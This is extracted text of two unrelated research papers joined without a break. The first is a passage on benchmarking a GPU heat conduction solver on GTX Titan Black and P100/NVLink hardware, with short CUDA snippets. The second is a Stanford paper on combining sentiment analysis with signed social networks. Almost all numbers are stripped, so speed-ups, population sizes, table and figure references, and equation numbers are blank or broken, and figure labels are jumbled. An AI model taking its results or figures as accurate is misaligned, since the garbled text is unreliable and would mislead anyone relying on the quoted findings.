the first warp should calculate the equations corresponding to the elements at the centre line ( items). the second warp should correspond to the outer surface elements ( items). threads in the next eight warps should be responsible for the inner elements ( elements), and the last warp should solve all the remaining equations ( elements). in this partitioning, only the last warp has divergent threads. the tests show that the gained speed-up is about – %. algorithm description the dhcp function of algorithm contains the main host-side steps of the gpu based direct heat conduction solver algorithm including device memory allocation/deallocation, memory transfers to/from the device and the kernel launch. the dhcp-kernel function shows the device-side steps of the heat transfer simulation according to the presented optimisation steps. results and discussion benchmarking methodology several benchmarks were run with the cpu and the gpu implementations focusing on the following questions: • what is the correlation between the number of cpu cores/gpu devices and the required runtime? a linear correlation is expected because of the weak dependencies between the different tasks. • in the case of gas, which hardware configuration is preferred for a given population size? the expectation is that it is worth using the cpu for small populations and the gpu for larger populations. • the amount of input parameters (htc control points) and output results (fitness values) is relatively small compared to other hpc applications. is the new nvlink technology between the cpu and gpu able to significantly reduce the memory transmission time for these small data transfers? the details of the test environments are as follows: • test environment (te ) – cpu— × intel(r) core(tm) i - ∗ physical cores ∗ logical cores – gpu— × geforce gtx titan black ∗ cuda cores: ∗ memory: gb ∗ link: pcie × + pcie × szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
algorithm data parallel dhcp solver require: htc: heat transfer coefficient require: t : initial temperature require: r: reference point inside the work object ensure: s[ ]: recorded temperature values at the reference point : function dhcp-kernel( ) f threadid: unique identifier in ...n·m− : (i,j)←assignthreadtofinitenode(threadid) f ‘warp divergence’ : ti,j ←t fshared array to store actual temp values (‘using shared memory’) : synchronise threads : for t ← to s.length− do : time← t∗dt factual time : temp←ti,j fthread-level variable (actual temp at (i,j) pos) : switch (i,j) do fcalculate heat movement (‘direct heat conduction problem’) : case ( , ) : temp← temp+heattransferinnertopcorner(t,htc) : case ... : ... : end switch : synchronise threads : ti,j ← temp : synchronise threads : if threadid= then ffirst thread calculates the result : s[t]← interpolatetempat(t,r) fcalculate temp at ref. point : end if : end for : end function : : function dhcp(htc,t ,r) : allocategpumemory( ) : copyfromhosttodevice(htc,t ,r) : dhcp-kernel ≪ n∗m ≫ ( ) flaunch n·m parallel threads : copyfromdevicetohost(s) : freegpumemory( ) : return s : end function szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. power cpu p gpu p gpunvlink nv li nk nvlink ram power cpu p gpu p gpunvlink nv li nk nvlink ram figure architecture of the ibm power system s lc for high performance computing. full-size doi: . /peerjcs. /fig- • test environment (te ) – cpu— × ibm power nvl ∗ cores – gpu— × tesla p -sxm ∗ cuda cores: ∗ memory: gb ∗ link: pcie ×+ nvlink te was a windows based desktop machine with two geforce gtx titan black cards installed into the pcie slots. the ihcp codebase was developed using visual studio (with cuda . ) and compiled with the nvidia nvcc compiler to standard bit executables. these binaries were launched from the standard windows command prompt. the c ++ standard std::chrono:high_resolution_clock object was used to measure the execution time. to decrease uncertainty, independent tests were run for all parameter sets, removing the lowest and highest runtimes ( – %) and computing the average of the remaining values. te was an ubuntu linux based power system s lc node in the ibm’s accelerator lab for high performance computing cluster. this is a two socket system equipped with the followings: power core cpus, up to tb system memory, and nvidia p gpus with nvlink connection. this system includes the exclusive nvlink high bandwidth interconnect between the power cpus and nvidia gpus, providing unprecedented bandwith between the cpu and gpus not available on any other platform. each p gpu is connected to one of the cpus with gb/sec bi-directional bandwith nvlink connections, and each pair of p gpus are also directly connected to each other with gb/sec bi-directional bandwidth nvlink connections (fig. ). the same codebase was compiled with gcc and cuda . tools using the arch=compute_ ,code=sm_ flags. the benchmarking methodology was the same as for te . several tests were run using different population sizes (p), where p = , , ... , . as a second parameter, the number of gpu devices (g) was changed, too. g= , for the szénási ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table runtime values for different population sizes with the geforce titan black cards. 
several tests were run using different population sizes (p), where p = , , ..., . as a second parameter, the number of gpu devices (g) was changed, too: g = , for the first environment, and g = , , , for the second environment. to compare the cpu and gpu performance, the same tests were run using a different number of cpu cores (c), where c = , , . the executed steps of the dhcp process are not affected by the actual htc values; therefore, predetermined input values were used for the simulations (instead of random chromosomes from a real genetic algorithm).

gpu runtimes
table and fig. show the gpu results for te , and table and fig. show the gpu results for te .

table : runtime values for different population sizes with the geforce titan black cards. each column shows the elapsed time for one step of the entire process (memory copy from host to device; kernel execution; memory copy from device to host) in the case of the single- and dual-gpu configurations; the last column shows the speed-up of the total time.

table : total runtime measured with the p cards using different population sizes and numbers of gpus. the last four columns show the speed-up compared to the dual geforce titan black configuration.

figure : runtime (µs) for different population sizes with the geforce titan black cards.

as expected, the required runtime is roughly inversely proportional to the number of devices. in practice, however, the picture is a bit more complex, because the series showing the runtimes in both figures are not straight lines, which is caused by a peculiarity of the gpu hardware. this fragmentation is most visible in the case of the single gtx titan black card (black solid series in fig. ): the total runtime increases only slightly from population size to , but the required runtime for population size is almost twice as large. the explanation for this phenomenon lies in the gpu architecture. the gtx titan black has streaming multiprocessors (each of them containing processing units), and every multiprocessor can execute four heat transfer simulations simultaneously; accordingly, launching one or parallel simulations takes a similar time. in the case of a greater number of threads, the scheduling (including memory transfers) becomes more complex; consequently, the effect of these steps becomes less sharp. as visible in fig. , these steps already exist for one p card: the runtime increases at every – th step. the p has multiprocessors, each of which can execute one simulation at a time; therefore, the device can run thermal history generations in parallel. this regularity can also be observed in the case of multiple gpus; for example, in the case of p devices, the steps from to ( · = ) and from to ( · · = ) have a significant impact on the runtime. it is worth evaluating as large a population as possible at the same time; thus, the recommended population size should be near to these limits from below ( or ).
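the position of these runtime steps can be estimated directly from the device properties; the sketch below assumes a fixed number of simulations per multiprocessor, which in reality depends on the kernel's register and shared-memory usage and has to be measured.

#include <cuda_runtime.h>
#include <cstdio>

// estimate how many heat-transfer simulations the installed gpus can run
// concurrently; population sizes just below a multiple of this value make
// the best use of the hardware
int concurrentSimulations(int simsPerMultiprocessor)
{
    int deviceCount = 0;
    cudaGetDeviceCount(&deviceCount);

    int total = 0;
    for (int d = 0; d < deviceCount; ++d) {
        cudaDeviceProp prop;
        cudaGetDeviceProperties(&prop, d);
        total += prop.multiProcessorCount * simsPerMultiprocessor;
    }
    return total;
}

int main()
{
    // four simulations per multiprocessor on the gtx titan black and one on
    // the p (values taken from the discussion above; kernel-dependent)
    std::printf("capacity step: %d simulations\n", concurrentSimulations(4));
    return 0;
}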
figure : runtime (µs) for different population sizes with the p cards.

table : runtime of the dhcp solver for different population sizes and cpu core counts (thread counts). the last two columns show the measured speed-up for configurations with cpu cores compared to five cpu cores, and four p gpus compared to cpu cores.

cpu runtimes
table and fig. show the cpu results for te . cpu performance analysis is not the focus of this paper; these benchmarks were run only for the cpu–gpu comparison. as visible, increasing the number of cores effectively increases the performance (each core is responsible for one heat transfer simulation). on the other hand, as the population size was increased, the runtime increased almost linearly. the cpu implementation is much simpler: there is no need to transfer input data from the host to the device and the output data from the device to the host, and the kernel launch overhead is also missing. therefore, the expectation was that the cpu would be faster in the case of small population sizes (where the gpus cannot take advantage of the high number of multiprocessors), but as is visible, this was not true.

figure : runtime (µs) for different population sizes with the power cpus.

comparing these results to the gpu runtimes, it is evident that it is not worth using the cpu for any population size. in the case of parallel heat transfer simulations (which is the ideal configuration for the server with cpu cores), all p gpu configurations were – times faster; above this population size, the difference becomes even bigger, and in the case of , parallel simulations, the p cards were times faster. this also raises the question of whether it is worth implementing a hybrid solution that combines the cpus and the gpus. for small population sizes, the answer is no: for example, in the case of chromosomes, if the gpus evaluate of them (taking about ms) and the cpus evaluate only one (taking about , ms), the overall runtime, max( ms, , ms) = , ms, is higher than with the plain gpu implementation. the only occasion when the hybrid implementation is worth considering is a large population size just above one of the previously explained runtime steps. for example, in the case of , chromosomes and two gpus, it would be worth assigning of them to the cpus: the cpu runtime is then about , ms and the gpu runtime for the remaining chromosomes is , ms, so the overall execution time is , ms, whereas the exclusive gpu implementation requires more, , ms. in the case of four gpus, a similar situation could also be found, but not in the examined – , population size interval.
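this back-of-the-envelope reasoning can be written down as a small cost model; the sketch below is illustrative only (the timing constants are measured quantities, and modelling the gpu side as fixed-size batches is a simplification).

#include <algorithm>

// estimated wall-clock time of evaluating `population` chromosomes when
// `toCpu` of them are assigned to the cpus and the rest to the gpus; the cpu
// and gpu parts run in parallel, so the total is the maximum of the two
double hybridRuntimeMs(int population, int toCpu,
                       double cpuTimePerChromMs,
                       double gpuBatchTimeMs, int gpuBatchCapacity)
{
    const int toGpu = population - toCpu;
    const int gpuBatches = (toGpu + gpuBatchCapacity - 1) / gpuBatchCapacity;
    const double cpuMs = toCpu * cpuTimePerChromMs;
    const double gpuMs = gpuBatches * gpuBatchTimeMs;
    return std::max(cpuMs, gpuMs);
}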
table : details of the host-to-device memory transfer for the geforce titan black cards. the first column shows the size of the population; the second one contains the total required memory for the chromosome data; the following columns contain the runtime of the device memory allocation and of the data transfer. the data transfer rate (dtr) is the amount of data that is moved in a given time.

table : details of the host-to-device memory transfer for the p cards (same columns as the previous table).

data transfer rates
during the tests, the data transfer rates were also recorded for te and te ; tables – and figs. – show these results. the advantage of the new nvlink-based power cpu–gpu connection is the high transfer bandwidth between the cpu and the gpu memory, and as visible from the results, this works well in practice. table shows that the measured results for te were far from the theoretical maximal transfer speed; it is also visible that using two gpus has an advantage over the single-gpu configuration. these devices are installed into different pci-e slots, so their data transfers can be processed in parallel (both cards were installed into pci-e × slots, but one of them works at × speed and the other one at × speed).

figure : memory transfer time (µs) for different population sizes with the geforce titan black cards.

in the case of the cpu–gpu nvlink architecture (table ), the bandwidth was significantly higher (although the amount of data is still too low to achieve the theoretical maximum). it is worth noting that with the two geforce gpus, the memory transfer is well over twice as fast as with one card; in sharp contrast, with two p cards it is only about % faster than with one card. what is more interesting, using three or four devices does not have any beneficial effect. the reason is that the p node has a special architecture in which one cpu socket and a maximum of two gpus form an 'island': within an island, any pair of the triad has fast data transfer, whereas transfers between islands are slower. in the case of ng gpus, the ihcp solver code uses ng individual cpu threads to manage the data transfers between the host and the devices. this practice was satisfactory for te , but it leads to the strange behaviour observed on te , because all of these threads were scheduled onto the same physical processor. to reach the maximum transfer rate with four devices, multiple cpu threads should be launched and bound to logical cpus that are appropriately placed for the gpus we intend to use. however, customizing the existing codebase to a specific architecture is outside the scope of this paper, especially in view of the fact that the nvlink-capable server was significantly faster even without any fine-tuning.
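for reference, the per-device transfer threads mentioned above can be sketched as follows. this is illustrative only; a version tuned for the power topology would additionally pin each thread to a core in the same island as its gpu (e.g., with pthread_setaffinity_np), which is exactly the fine-tuning step left open above.

#include <cuda_runtime.h>
#include <thread>
#include <vector>

// copy one chunk of chromosome data to each gpu from its own host thread so
// that the transfers can overlap (chunk layout is illustrative)
void uploadToAllGpus(const std::vector<const float*>& hostChunks,
                     const std::vector<float*>& deviceChunks,
                     size_t chunkBytes)
{
    std::vector<std::thread> workers;
    for (size_t g = 0; g < deviceChunks.size(); ++g) {
        workers.emplace_back([&, g] {
            cudaSetDevice(static_cast<int>(g));   // each thread drives one gpu
            // note: to exploit the cpu–gpu islands, this thread should also be
            // pinned to a core attached to the same socket as gpu g
            cudaMemcpy(deviceChunks[g], hostChunks[g], chunkBytes,
                       cudaMemcpyHostToDevice);
        });
    }
    for (auto& w : workers) w.join();
}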
comparing the gtx and p based configurations, the latter was – times faster. the new nvlink architecture is, therefore, faster, and its overall transfer rate becomes higher with multiple cards. this speed-up is achievable in the case of small population sizes as well (it is times quicker in the case of chromosomes and gpus). therefore, this novel architecture is highly recommended for running the ihcp solver gas.

figure : memory transfer time (µs) for different population sizes with the p cards.

conclusions
a novel data-parallel algorithm to solve the ihcp and a gpu-based implementation were outlined. by using a higher level of parallelism, the solver can use the processing power of current multi-gpu systems. analysing the architecture of the new p -based servers and the runtime results, the conclusions are as follows:
• in the case of the ihcp, the runtime of both the cpu and the gpu implementations depends nearly linearly on the population size, and inversely on the number of processing cores. in the case of gpus, the number of devices and the multiprocessor architecture make this correlation more complex, with the runtime increasing significantly at given (predictable) population sizes.
• according to this observation, the recommended population size is close to these points from below for the exclusive gpu implementations. in the case of hybrid systems, the most efficient population size should be close to these points from above.
• the nvlink connection between the cpu and the gpus can significantly decrease the data transfer time. it is also faster for small population sizes; however, the maximal bandwidth is not achievable in these cases.

the results of this work encourage the use of multiple graphics accelerators for the purposes of heat transfer simulations. to fully utilise the processing power of all gpus, it is necessary to reach a higher level of parallelism, but there are several subfields (like the ihcp) where this is feasible. as future work, it is worth fine-tuning the algorithm to the new ibm power system architecture: only a naïve port of the already existing cuda algorithms was used in this new environment, without any major changes. it deserves a deeper study to see why only one block is scheduled onto each multiprocessor of the p devices; if some minor configuration changes (decreasing the number of registers or the shared memory usage) make it possible to run multiple blocks, this could double the performance of the system.

additional information and declarations

funding
the author received financial support from the hungarian state and the european union under the efop- . . - - - project. nvidia corporation provided graphics hardware for the gpu benchmarks through the cuda teaching center program. this work was additionally supported by the Únkp- - /i new national excellence program of the ministry of human capacities. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the author: hungarian state and the european union. nvidia corporation. Únkp- - /i new national excellence program of the ministry of human capacities.
competing interests
sándor szénási is an academic editor for peerj computer science.

author contributions
• sándor szénási conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: all raw benchmark data have been uploaded as supplemental files.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
exploiting social network structure for person-to-person sentiment analysis

robert west, stanford university, west@cs.stanford.edu
hristo s. paskov, stanford university, hpaskov@stanford.edu
jure leskovec, stanford university, jure@cs.stanford.edu
christopher potts, stanford university, cgpotts@stanford.edu

abstract
person-to-person evaluations are prevalent in all kinds of discourse and important for establishing reputations, building social bonds, and shaping public opinion. such evaluations can be analyzed separately using signed social networks and textual sentiment analysis, but this misses the rich interactions between language and social context. to capture such interactions, we develop a model that predicts individual a's opinion of individual b by synthesizing information from the signed social network in which a and b are embedded with sentiment analysis of the evaluative texts relating a to b. we prove that this problem is np-hard but can be relaxed to an efficiently solvable hinge-loss markov random field, and we show that this implementation outperforms text-only and network-only versions in two very different datasets involving community-level decision-making: the wikipedia requests for adminship corpus and the convote u.s. congressional speech corpus.

introduction
people's evaluations of one another are prevalent in all kinds of discourse, public and private, across ages, genders, cultures, and social classes (dunbar, ). such opinions matter for establishing reputations and reinforcing social bonds, and they are especially consequential in political contexts, where they take the form of endorsements, accusations, and assessments intended to sway public opinion.

the significance of such person-to-person evaluations means that there is a pressing need for computational models and technologies that can analyze them. research on signed social networks suggests one path forward: how one person will evaluate another can often be predicted from the network they are embedded in.
linguistic sentiment analysis sug- gests another path forward: one could leverage tex- tual features to predict the valence of evaluative texts describing people. such independent efforts have been successful, but they generally neglect the ways in which social and linguistic features complement each other. in some settings, textual data is sparse but the network structure is largely observed; in oth- ers, text is abundant but the network is partly or un- reliably recorded. in addition, we often see rich in- teractions between the two kinds of information— political allies might tease each other with negative language to enhance social bonds, and opponents of- ten use sarcastically positive language in their criti- cisms. separate sentiment or signed-network mod- els will miss or misread these signals. we develop (sec. ) a graphical model that syn- thesizes network and linguistic information to make more and better predictions about both. the objec- tive of the model is to predict a’s opinion of b using a synthesis of the structural context around a and b inside the social network and sentiment analysis of the evaluative texts relating a to b. we prove that the problem is np-hard but that it can be relaxed to an efficiently solvable hinge-loss markov random field (broecheler et al., ), and we show that this implementation outperforms text-only and network- only versions in two very different datasets involv- ing community-level decision-making: the wikipe- dia requests for adminship corpus, in which wi- kipedia editors discuss and vote on who should be promoted within the wikipedia hierarchy (sec. ), and the convote u.s. congressional speech corpus (thomas et al., ), in which elected officials dis- cuss political topics (sec. ). these corpora differ dramatically in size, in the style and quality of their textual data, and in the structure and observability of their networks. together, they provide a clear pic- ture of how joint models of text and network struc- ture can excel where their component parts cannot. background and related work . sentiment analysis in nlp, the label sentiment analysis covers diverse phenomena concerning how information about emo- tions, attitudes, perspectives, and social identities is conveyed in language (pang and lee, ). most work assumes a dimensional model in which emo- tions are defined primarily by valence/polarity and arousal/intensity (russell, ; feldman barrett and russell, ; rubin and talerico, ), and the dominant application is predicting the valence of product, company, and service reviews. we adopt the conceptual assumptions of this work for our basic sentiment model, but our focus is on person-to-person evaluations and their social conse- quences. this involves elements of work on mod- eling political affiliation (agrawal et al., ; mal- ouf and mullen, ; yu et al., ), bias (yano et al., ; recasens et al., ), and stance on de- bate topics (thomas et al., ; somasundaran and wiebe, ; lin et al., ; anand et al., ), but these aspects of belief and social identity are not our primary concern. rather, we expect them to be predictive of the sentiment classifications we aim to make—e.g., if two people share political views, they will tend to evaluate each other positively. recent work in sentiment analysis has brought in topical, contextual, and social information to make more nuanced predictions about language (jurafsky et al., ; wilson et al., ; blitzer et al., ). 
we build on these insights with our model, which seeks to modulate sentiment predictions based on network information (and vice versa). . signed-network analysis many social networks encode person-to-person sen- timent information via signed edges between users summarizing their opinions of each other. in this set- ting, one can leverage sociological theories of pair- wise relationships and group-level organization to identify and understand patterns in these relation- ships (heider, ; cartwright and harary, ). balance theory is based on simple intuitions like ‘a friend of my friend is my friend’, ‘an enemy of my enemy is my friend’, and ‘an enemy of my friend is my enemy’. in graph theory, these are statements about the edge signs of triangles of connected nodes: given the signs of two edges, balance theory predicts the third, as summarized in fig. (a), where the two given edges (gray) determine the third (black). for directed relationships, leskovec et al. ( b) formulate an alternative called status theory, which posits that networks organize according to social sta- tus: a node has positive edges to others with higher status and negative edges to those with lower sta- tus. fig. (a) illustrates the structure of various di- rected signed triangles, where the sign of the third edge (black) can be inferred based on the signs and directions of the other two (gray). leskovec et al. ( b) show that signed edges in networks emerge in a manner that is broadly con- sistent with both of these theories and that social- network structure alone can support accurate edge- sign predictions (leskovec et al., a). kunegis et al. ( ) predict hidden positive and negative edges in a scenario where all observed edges are positive. bach et al. ( ) and huang et al. ( ) frame sign prediction as a hinge-loss markov random field, a type of probabilistic graphical model introduced by broecheler et al. ( ). our model combines these ideas with a sentiment model to achieve even more robust predictions. . synthesis of sentiment & network analysis models of sentiment and signed networks have been successful at a variety of tasks. however, missing from the current scientific picture is a deep under- standing of the ways in which sentiment expres- sion and social networks interact. to some extent, these interactions are captured by adding contextual and demographic features to a text-based sentiment model, but those features only approximate the rich relational structure encoded in a signed network. thomas et al. ( ) and tan et al. ( ) cap- italize on this insight using an elaboration of the + + +– +– – –+ – – – + + + social balance theory social status theory + – ? (a) theories of social balance and status + + – – ? ? + ? “you’re one crazy mofo!” “love u! :)” “to whom it may concern” (b) desiderata figure : (a) predictions of social balance and status theories for the bold black edge, given the thin gray edges. balance theory reasons about undirected, status theory about directed, triangles. in the status diagrams, node size signifies social status. a positive edge may be replaced by a negative edge in the opposite direction, and vice versa, without changing the prediction. status theory makes no prediction in the rightmost case. (b) situations of the sort we aim to capture. at left, the network resolves textual ambiguity. at right, the text compensates for edge-label sparsity. graph-cuts approach of pang and lee ( ). 
they are guided by an assumption of homophily, i.e., that certain social relationships correlate with agreement on certain topics: thomas et al. ( ) use party af- filiation and mentions in speeches to predict voting patterns, and tan et al. ( ) use twitter follows and mentions to predict attitudes about political and social events. related ideas are pursued by ma et al. ( ) and hu et al. ( ), who add terms to their models enforcing homophily between friends with regard to their preferences. we adopt some of the assumptions of the above authors, but our task is fundamentally different in two respects. first, whereas they model person-to- item evaluations, we model person-to-person evalu- ations; these are also the focus of tang et al. ( ), who, though, use an unsigned network, whereas our work is geared toward distinguishing positive and negative edge labels. second, the above models make overarching homophily assumptions, whereas we allow our model to explore the full set of triangle configurations suggested by fig. (a). model here, we argue that combining textual and structural features can help predict edge signs. we formu- late a model, show that it is computationally hard, and provide a relaxed version that is computationally tractable, building on work by bach et al. ( ). . desiderata in many real-world scenarios, rich features are asso- ciated with edges between two people, such as com- ments they made about each other, messages they exchanged, or other behavioral features. such fea- tures may contain a strong sentiment signal useful for predicting edge signs and may be used to fit a conventional sentiment model (sec. . ). however, the sign of an edge also depends on the signs of surrounding edges in the network (sec. . ). a purely edge-feature–based sentiment model can- not account for the network structure, since it rea- sons about edges as independent of each other. we argue that considering sentiment and network structure jointly can result in better predictions than either one on its own. fig. (b) provides two illus- trative examples. here, the gray edge signs are ob- served, while the polarities of the black edges are to be predicted. in the left network, the text of the black edge (‘you’re one crazy mofo!’) might sug- gest a negative polarity. however, a negative black edge would make both triangles inconsistent with balance theory (fig. (a)), whereas a positive black edge makes them consistent with the theory. so, in this case, the network context effectively helps de- tect the teasing, non-literal tone of the statement. in the right network of fig. (b), only one of three edge signs is observed. predicting two pos- itive edges would be consistent with balance the- ory, but the same would be true for predicting two negative edges. the text on the lower black edge (‘to whom it may concern’) does not carry any clear sentiment signal, but the ‘love u! :)’ on the other edge strongly suggests a positive polarity. this lets us conclude that the bottom edge should probably be positive, too, since otherwise the triangle would contradict balance theory. this shows that combin- ing sentiment and network features can help when jointly reasoning about several unknown edge signs. . problem formulation we now formulate a model capable of synthesizing textual and network features. notation. 
we represent the given social network as a signed graph g = (v, e, x), where the vertices v represent people; the edges e, relationships between people in v; and the sign vector x ∈ {0, 1}^|e| represents edge polarities, i.e., x_e = 1 (x_e = 0) indicates a positive (negative) polarity for edge e ∈ e. some types of relationships imply directed edges (e.g., following a user on twitter, or voting on a candidate in an election), whereas others imply undirected edges (e.g., friendship on facebook, or agreement in a network of politicians). we formulate our problem for undirected graphs here, but the extension to directed graphs is straightforward. we define a triangle t = {e_1, e_2, e_3} ⊆ e to be a set of three edges that form a cycle, and use t to indicate the set of all triangles in g. finally, we use x_t = (x_{e_1}, x_{e_2}, x_{e_3}) ∈ {0, 1}^3 to refer to t's edge signs.

optimization problem. we assume that the structure of the network (i.e., v and e) is fully observed, whereas the edge signs x are only partially observed. further, we assume that we have a sentiment model that outputs, for each edge e independently, an estimate p_e of the probability that e is of positive polarity, based on textual features associated with e. the task, then, is to infer the unobserved edge signs based on the observed information.

the high-level idea is that we want to infer edge signs that (1) agree with the predictions of the sentiment model, and (2) form triangles that agree with social theories of balance and status. it is not always possible to meet both objectives simultaneously for all edges and triangles, so we need to find a trade-off. this gives rise to a combinatorial optimization problem, which we term triangle balance, that seeks to find edge signs x* that minimize an objective consisting of both edge and triangle costs:

x* = arg min_{x ∈ {0,1}^|e|} ∑_{e∈e} c(x_e, p_e) + ∑_{t∈t} d(x_t).   (1)

the first term is the total edge cost, in which each edge e contributes a cost capturing how much its inferred sign x_e deviates from the prediction p_e of the sentiment model. (of course, the entries of x* corresponding to observed edges are not variable but fixed to their observed values in eq. 1.) the second term, the total triangle cost, penalizes each triangle t according to how undesirable its configuration is under its inferred signs x_t (e.g., if it contradicts status or balance theory). we use the following edge cost function:

c(x_e, p_e) = λ_1 (1 − p_e) x_e + λ_0 p_e (1 − x_e).   (2)

here, λ_1, λ_0 ∈ R_+ are tunable parameters that allow for asymmetric costs for positive and negative edges, respectively, and p_e is the probability of edge e being positive according to the sentiment model alone. intuitively, the more the inferred edge sign x_e deviates from the prediction p_e of the sentiment model, the higher the edge cost. (note that at most one of the two summands of eq. 2 is non-zero.)

the triangle cost for triangle t is signified by d(x_t), which can only take on 2^3 = 8 distinct values because x_t ∈ {0, 1}^3 (in practice, symmetries decrease this number further). the parameters d(x_t) may be tuned so that triangle configurations that agree with social theory have low costs, while those that disagree with it (e.g., 'the enemy of my friend is my friend') have high costs.

computational complexity
the problem defined in eq. 1 is intuitive, but, as with many combinatorial optimization problems, it is hard to find a good solution. in particular, we sketch a proof of the following theorem in appendix a:

theorem 1. triangle balance is np-hard.
relaxation as a markov random field
the objective function of eq. 1 may be seen as defining a markov random field (mrf) over the underlying social network g, with edge potentials (defined by c) and triangle potentials (defined by d). inference in mrfs (i.e., computing x*) is a well-studied task for which a variety of methods have been proposed (koller and friedman, ). however, since our problem is np-hard, no method can be expected to find x* efficiently. one way of dealing with the computational hardness would be to find an approximate binary solution, using techniques such as gibbs sampling or belief propagation. another option is to consider a continuous relaxation of the binary problem and find an exact non-binary solution whose edge signs are continuous, i.e., x_e ∈ [0, 1].

we take this latter approach and cast our problem as a hinge-loss markov random field (hl-mrf). this is inspired by bach et al. ( ), who also use an hl-mrf to predict edge signs based on triangle structure, but do not use any edge features. an hl-mrf is an mrf with continuous variables and with potentials that can be expressed as sums of hinge-loss terms of linear functions of the variables (cf. broecheler et al. ( ) for details). hl-mrfs have the advantage that their objective function is convex, so that, unlike for binary mrfs (as defined by eq. 1), exact inference is efficient (bach et al., ).

we achieve a relaxation by using sums of hinge-loss terms to interpolate c over the continuous domain [0, 1] and d over [0, 1]^3 (even though they are defined only for binary domains). as a result, the hl-mrf formulation is equivalent to eq. 1 when all x_e are binary, but it also handles continuous values gracefully. we now interpret a real-valued 'sign' x_e ∈ [0, 1] as the degree to which e is positive. we start by showing how to transform c: even though it could be used in its current form (eq. 2), we create a tighter relaxation by using

c̃(x_e, p_e) = λ_1 ‖x_e − p_e‖_+ + λ_0 ‖p_e − x_e‖_+,   (3)

where ‖y‖_+ = max{0, y} is the hinge loss. at most one term can be active for any x_e ∈ [0, 1] due to the hinge loss, and c(x_e, p_e) = c̃(x_e, p_e) for binary x_e.

to rewrite d, notice that, for any x_t ∈ {0, 1}^3, we can write d as

d(x_t) = ∑_{z ∈ {0,1}^3} d(z) δ(x_t, z),   (4)

where δ(x_t, z) = 1 if x_t = z and 0 otherwise. while δ is not convex, we can use

f(x_t, z) = ‖1 − ‖x_t − z‖_1‖_+   (5)

as a convex surrogate. when x_t is binary, either x_t = z, so ‖x_t − z‖_1 = 0, or x_t ≠ z, so ‖x_t − z‖_1 ≥ 1, and hence f(x_t, z) = δ(x_t, z). to prove convexity, note that, for any fixed binary z ∈ {0, 1}^3, ‖x − z‖_1 = ∑_{i=1}^{3} |x_i − z_i| is linear in x ∈ [0, 1]^3, since |x_i − z_i| equals either x_i (if z_i = 0) or 1 − x_i (if z_i = 1). it follows that f is a hinge-loss function of a linear transformation of x_t and therefore convex in x_t.

figure : options for training and testing our model (random sampling vs. bfs sampling; training, testing, evidence, and to-infer edges).

requiring the triangle cost d(z) to be nonnegative for all triangle types z ∈ {0, 1}^3, we can use

d̃(x_t) = ∑_{z ∈ {0,1}^3} d(z) f(x_t, z)   (6)

as a convex surrogate for d. our overall optimization problem is then the following relaxation of eq. 1:

x* = arg min_{x ∈ [0,1]^|e|} ∑_{e∈e} c̃(x_e, p_e) + ∑_{t∈t} d̃(x_t).   (7)

this objective has the exact form of an hl-mrf, since it is a weighted sum of hinge losses of linear functions of x. we use the probabilistic soft logic package to perform the optimization, which is in turn based on the alternating-direction method of multipliers (admm) (boyd et al., ).
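as a quick sanity check of the surrogate f, one can verify eq. 5 on a few binary sign vectors (the vectors below are hypothetical examples, not taken from the data):

for x_t = (1,0,1) and z = (1,0,1): ‖x_t − z‖_1 = 0, so f(x_t, z) = max{0, 1 − 0} = 1 = δ(x_t, z);
for x_t = (1,0,1) and z = (1,1,1): ‖x_t − z‖_1 = 1, so f(x_t, z) = max{0, 1 − 1} = 0 = δ(x_t, z);
for x_t = (1,0,1) and z = (0,1,0): ‖x_t − z‖_1 = 3, so f(x_t, z) = max{0, 1 − 3} = 0 = δ(x_t, z).

only for fractional x_t does f depart from δ, which is exactly where the convex interpolation is needed.

learning.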
clearly, a solution is only useful if the cost parameters (λ , λ , and d(z) for all z ∈{ , } ) are set appropriately. one option would be to set the values heuristically, based on the predictions made by the social balance and status theories (sec. . ). however, it is more principled to learn these param- eters from data. for this purpose, we leverage the learning procedures included in the hl-mrf imple- mentation we employ, which uses the voted-percep- tron algorithm to perform maximum-likelihood esti- mation (bach et al., ). since our data points (edges) interact with each other via the network, some words on how we per- form training and testing are in order. fig. shows two options for obtaining training and testing sets (we use both options in our experiments). in the ‘random sampling’ paradigm, we randomly choose a set of edges for training (blue), and a disjoint set of edges for testing (yellow). in ‘bfs sampling’, we http://psl.umiacs.umd.edu run a breadth-first search from seed node u to obtain a coherent training set (blue), and likewise from a seed node v to obtain a coherent testing set (yellow), taking care that no edges from the training set are also included in the testing set. during both training and testing, an arbitrary por- tion of the edge signs may be fixed to observed val- ues and need not be inferred. these are the solid edges in fig. ; we refer to them as evidence. fur- ther, we define the evidence ratio as the number of evidence edges, divided by the number of all edges considered (solid and dashed). the learning algorithm may use the structure (v and e) of the training graph induced by all blue edges (solid and dashed), the predictions pe of the sentiment model for all blue edges, and the signs of the solid blue edges to predict the dashed blue edges. during testing, the network structure of all yel- low edges, the sentiment predictions for all yellow edges, and the signs of the solid yellow edges may be used to predict the dashed yellow edge signs. in principle, all training edges could be used as extra evidence for testing (i.e., all blue edges may be made solid yellow). however, in our experiments, we keep the training and testing sets fully disjoint. technical details. for clarity, we give further de- tails. first, the distribution of positive and negative signs may be skewed; e.g., we observe a prior prob- ability of % positive signs in our wikipedia cor- pus (sec. ). therefore, as also done by bach et al. ( ), we add a cost term to our objective (eq. ) that penalizes deviations from this prior probabil- ity (as estimated on the training set). this ensures that the model can default to a reasonable prediction for edges that are not embedded in any triangles and about which the sentiment model is uncertain. second, intuitively, we should not penalize devi- ating from the sentiment model when it is itself un- certain about its prediction (i.e., when pe is far from both and ). rather, we want to rely more heavily on signals from the network structure in such cases. to achieve this, we introduce pairs of cost param- eters (λ( ) ,λ ( ) ),...,(λ ( ) ,λ ( ) ). then, we divide the interval [ , ] into bins, and when pe falls into the i-th bin, we use λ(i) and λ (i) in eq. . this way, larger costs can be learned for the extreme bins close to and than for the intermediate bins around . . finally, hinge-loss terms may optionally be squared in hl-mrfs. we use the squared hinge loss in eq. 
